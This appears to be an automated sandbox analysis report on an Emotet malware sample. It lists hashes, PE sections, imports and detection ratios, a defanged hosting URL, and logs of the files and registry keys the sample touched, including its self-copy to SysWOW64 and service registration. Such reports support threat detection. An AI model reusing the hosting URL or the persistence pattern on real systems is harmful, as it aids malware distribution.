MalScore
100/100
MalFamily
Emotet

Bz4pEqDQw

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 47/69
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386, for MS Windows
File size: 354.00 KB (362496 bytes)
Compile time: 2018-12-01 19:46:33
MD5: a82c84fabb131cfc7843c36aa6072f37
SHA1: 2832eb9d2ce0f5bd801a3cb40bca9a7faa8fe1d6
SHA256: 1b87df14e6426cecd0ee7ccdf48c6e721ce932c399f27abe14e0dcdfad8b64ea
Import hash: ff1776618d4045eb9408ccb4438426af
Sections 7 .text .data .idata c6J|L K9s .rsrc .reloc
Directories 5 import export resource debug relocation
First submission: 2018-12-07 11:42:05
Last submission: 2018-12-07 11:42:05
Filename detected: - Bz4pEqDQw (1)
URL file hosting
hXXp://triton.fi/Bz4pEqDQw/VirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-12-07 05:31:27 [47/69] VirusTotal
PE Sections 0 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x1000 0x7794 30720 3903d88df2a3b93746dcd17ff137f59a c1bb8a01d132c7f2d608f689982ac4bac4847f74
.data 0x9000 0x47a0 11776 1740a9d0e768aff0465067729656f712 0d0c1bba309fa20c18483cdc4ca0c3ce250a1b59
.idata 0xe000 0x2ea 1024 8a6ec6119694874b31bf68dfa5de1db5 09aa88f5d9b06f5eca4372a48037e630acd7825a
c6J|L 0xf000 0x213dc 136192 40d69ec42c58d3f75b7d4ad657069128 016b3cb435e81f8e7a49a6224a8df9f914c33f9a
K9s 0x31000 0x2ab1e 175104 e70b4103da1c6dbad06e112ea36e1ed5 751d92b80d9b0d7ca0354ddaed67ea97ff0bf38e
.rsrc 0x5c000 0xe90 4096 b52464f5acb43b6921fdc92eafeecdb5 0b745ee42172d0ec84083fc8f6474c4b9e05964e
.reloc 0x5d000 0x9b0 2560 a1008e9887ca4a819dd639178144ba28 1b7559e1f97d8b3bb1b12ba42845ebbdb452bf95
Meta Info
No Meta found in this file
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
No packers found for this file
File found
FIle type: Library
ADVAPI32.dll
SHLWAPI.dll
SHELL32.dll
AVIFIL32.dll
USER32.dll
SETUPAPI.dll
KERNEL32.dll
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-12-07 11:37:45 2018-12-07 11:40:51 186

14 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-12-07 11:37:45 2018-12-07 11:40:51 186

12 Summary items with data

Files

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\
C:\Users\Seven01\AppData\Local\Temp\Bz4pEqDQw.exe
C:\Windows\SysWOW64\hexapremium.exe
C:\Windows\
C:\Windows\SysWOW64\
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\ifacerunning.exe
C:\Users
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db
C:\Users\desktop.ini
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows
C:\Windows\SysWOW64
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Windows\SysWOW64\it-IT\SHELL32.dll.mui
\??\MountPointManager
C:\Users\Seven01\AppData\Local\
C:\Windows\SysWOW64\ifacerunning.exe:Zone.Identifier
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6
C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b
C:\Windows\sysnative\LogFiles\Scm\fca58fb2-231f-4daa-bca0-77602b638485
C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:
\??\PhysicalDrive0
\??\pci#ven_8086&dev_100e&subsys_001e8086&rev_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{c2d43895-0262-4873-a789-c2f96d24b693}
\??\root#*isatap#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{684bb8b6-2793-49a5-8012-e0a941b4b4df}
\??\root#*isatap#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{5f6d61d9-d207-449a-bd48-652a5d1f25be}
\??\root#ms_agilevpnminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{29898c9d-b0a4-4fef-bdb6-57a562022cee}
\??\root#ms_l2tpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{e43d242b-9eab-4626-a952-46649fbb939a}
\??\root#ms_ndiswanbh#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanbh
\??\root#ms_ndiswanip#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanip
\??\root#ms_ndiswanipv6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanipv6
\??\root#ms_pppoeminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{8e301a52-affa-4f49-b9ca-c79096a1a056}
\??\root#ms_pptpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{df4a9d2c-8742-4eb1-8703-d395c4183f33}
\??\root#ms_sstpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{71f897d7-eb7c-4d8d-89db-ac80d9dd2270}
\??\root#system#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac
\??\SPDevice
C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\Cache\cache.dat

Read Files

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Local\Temp\Bz4pEqDQw.exe
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db
C:\Users\desktop.ini
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Windows
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\SysWOW64\it-IT\SHELL32.dll.mui
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6
C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b
C:\Windows\sysnative\LogFiles\Scm\fca58fb2-231f-4daa-bca0-77602b638485
C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
C:\Windows\SysWOW64\ifacerunning.exe
\??\pci#ven_8086&dev_100e&subsys_001e8086&rev_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{c2d43895-0262-4873-a789-c2f96d24b693}
\??\root#*isatap#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{684bb8b6-2793-49a5-8012-e0a941b4b4df}
\??\root#*isatap#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{5f6d61d9-d207-449a-bd48-652a5d1f25be}
\??\root#ms_agilevpnminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{29898c9d-b0a4-4fef-bdb6-57a562022cee}
\??\root#ms_l2tpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{e43d242b-9eab-4626-a952-46649fbb939a}
\??\root#ms_ndiswanbh#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanbh
\??\root#ms_ndiswanip#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanip
\??\root#ms_ndiswanipv6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanipv6
\??\root#ms_pppoeminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{8e301a52-affa-4f49-b9ca-c79096a1a056}
\??\root#ms_pptpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{df4a9d2c-8742-4eb1-8703-d395c4183f33}
\??\root#ms_sstpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{71f897d7-eb7c-4d8d-89db-ac80d9dd2270}
\??\root#system#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac

Write Files

C:\Windows\SysWOW64\ifacerunning.exe
\??\SPDevice
C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\Cache\cache.dat

Delete Files

C:\Windows\SysWOW64\hexapremium.exe
C:\Users\Seven01\AppData\Local\Temp\Bz4pEqDQw.exe
C:\Windows\SysWOW64\ifacerunning.exe:Zone.Identifier

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\Bz4pEqDQw.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\PropertyHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\Bz4pEqDQw.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\Bz4pEqDQw.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ifacerunning
